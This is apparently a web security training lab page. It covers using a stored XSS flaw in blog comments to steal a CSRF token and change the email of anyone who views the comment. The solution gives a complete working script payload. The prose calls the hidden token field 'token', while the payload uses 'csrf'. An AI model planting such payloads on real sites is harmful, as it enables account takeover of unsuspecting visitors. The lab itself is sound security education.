Lab: Exploiting XSS to bypass CSRF defenses

PRACTITIONER

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to steal a CSRF token, which you can then use to change the email address of someone who views the blog post comments.

You can log in to your own account using the following credentials: wiener:peter

Hint

You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, use a different email address for the final exploit you deliver to the victim.

Solution

  1. Log in using the credentials provided. On your user account page, notice the function for updating your email address.
  2. If you view the source for the page, you'll see the following information:
    • You need to issue a POST request to /my-account/change-email, with a parameter called email.
    • There's an anti-CSRF token in a hidden input called token.
    This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim's email address.
  3. Submit the following payload in a blog comment:

    <script>
      // Fetch the viewer's own account page on the same origin
      var req = new XMLHttpRequest();
      req.onload = handleResponse;
      req.open('get', '/my-account', true);
      req.send();

      function handleResponse() {
        // Extract the value of the hidden csrf input from the response body
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        // Replay the token in a POST that changes the viewer's email address
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/my-account/change-email', true);
        changeReq.send('csrf=' + token + '&email=test@test.com');
      }
    </script>

    This will make anyone who views the comment issue a POST request to change their email address to test@test.com.

Community solutions

z3nsh3ll
Michael Sommer